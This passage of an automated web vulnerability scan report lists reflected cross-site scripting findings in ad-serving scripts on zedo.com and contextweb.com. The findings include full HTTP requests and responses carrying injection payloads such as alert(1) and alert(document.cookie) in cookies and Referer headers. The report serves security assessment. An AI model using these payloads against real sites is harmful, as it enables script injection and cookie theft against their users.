Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411e1c31"-alert(1)-"9a8564b65f6; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0; FFcat=1220,101,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=36
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:14 GMT
Connection: close
Content-Length: 1959

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=126;var zzPat='';var zzC
...[SNIP]...
);}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411e1c31"-alert(1)-"9a8564b65f6';

var zzhasAd=undefined;


               var zzStr = "s=126;u=INmz6woBADYAAHrQ5V4AAACH~010411e1c31"-alert(1)-"9a8564b65f6;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

4.1039. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [FFpb cookie]

Summary

Severity:   Information
Confidence:   Firm
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the FFpb cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 91742(a)29b2b8ea683 was submitted in the FFpb cookie. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFpb=1220:4f791'91742(a)29b2b8ea683; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1017
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'91742(a)29b2b8ea683;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=251
Expires: Fri, 28 Jan 2011 17:30:57 GMT
Date: Fri, 28 Jan 2011 17:26:46 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo.com/bar/v16-401/c5/jsc/fmr.js;qs=;';


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='None,4f791'91742(a)29b2b8ea683';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=None,4f791'91742(a)29b2b8ea683;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;
v
...[SNIP]...

4.1040. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74c5d"-alert(1)-"8b3d70f9a46 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~01041174c5d"-alert(1)-"8b3d70f9a46; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=35
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:15 GMT
Connection: close
Content-Length: 1956

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat='';var zzCu
...[SNIP]...
();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~01041174c5d"-alert(1)-"8b3d70f9a46';

var zzhasAd=undefined;


               var zzStr = "s=69;u=INmz6woBADYAAHrQ5V4AAACH~01041174c5d"-alert(1)-"8b3d70f9a46;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

4.1041. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [FFpb cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the FFpb cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 646ab"-alert(1)-"3ae61a116c4 was submitted in the FFpb cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=spectrum300x250&s=2&z=0.47118410957045853 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38178276&rk1=15197426&rk2=1296251850.36&pt=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250646ab"-alert(1)-"3ae61a116c4; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1; ZFFAbh=749B826,20|1483_759#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:spectrum300x250,ibnetwork300x250646ab"-alert(1)-"3ae61a116c4;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,2,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:2:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213#562813|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2:0,26,1;expires=Mon, 28 Feb 2011 02:02:42 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=114
Expires: Sat, 29 Jan 2011 02:04:36 GMT
Date: Sat, 29 Jan 2011 02:02:42 GMT
Connection: close
Content-Length: 2517

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='spectrum300x250,ibnetwork300x250646ab"-alert(1)-"3ae61a116c4';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=spectrum300x250,ibnetwork300x250646ab"-alert(1)-"3ae61a116c4;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                                                                                           
...[SNIP]...

4.1042. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [FFpb cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the FFpb cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 390b7'-alert(1)-'191f222b511 was submitted in the FFpb cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=spectrum300x250&s=2&z=0.47118410957045853 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38178276&rk1=15197426&rk2=1296251850.36&pt=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250390b7'-alert(1)-'191f222b511; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1; ZFFAbh=749B826,20|1483_759#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:spectrum300x250,ibnetwork300x250390b7'-alert(1)-'191f222b511;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,2,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:2:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213#562813|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2:0,26,1;expires=Mon, 28 Feb 2011 02:02:49 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=107
Expires: Sat, 29 Jan 2011 02:04:36 GMT
Date: Sat, 29 Jan 2011 02:02:49 GMT
Connection: close
Content-Length: 2517

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='spectrum300x250,ibnetwork300x250390b7'-alert(1)-'191f222b511';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=spectrum300x250,ibnetwork300x250390b7'-alert(1)-'191f222b511;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~0104
...[SNIP]...

4.1043. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae9a4"-alert(1)-"4d1fa70ea4e was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.43167143454775214 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411ae9a4"-alert(1)-"4d1fa70ea4e; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; FFpb=1220:4f791'; FFcat=1220,101,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1;expires=Mon, 28 Feb 2011 02:00:39 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=162
Expires: Sat, 29 Jan 2011 02:03:21 GMT
Date: Sat, 29 Jan 2011 02:00:39 GMT
Connection: close
Content-Length: 2280

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...



                                                        var zzStr = "s=2;u=INmz6woBADYAAHrQ5V4AAACH~010411ae9a4"-alert(1)-"4d1fa70ea4e;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

4.1044. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [V cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TAGPUBLISH/getad.aspx

Issue detail

The value of the V cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22348'%3balert(1)//7865b00c16b was submitted in the V cookie. This input was echoed as 22348';alert(1)//7865b00c16b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TAGPUBLISH/getad.aspx?tagver=1&cd=1&if=0&ca=VIEWAD&cp=513102&ct=50151&cf=300X250&cn=1&rq=1&fldc=5&dw=1036&cwu=http%3A%2F%2Fevents.cbs6albany.com%2F%3F376e5%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Ea7771aeaee3%3D1&mrnd=63109582 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj22348'%3balert(1)//7865b00c16b; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9; cw=cw

Response

HTTP/1.1 200 OK
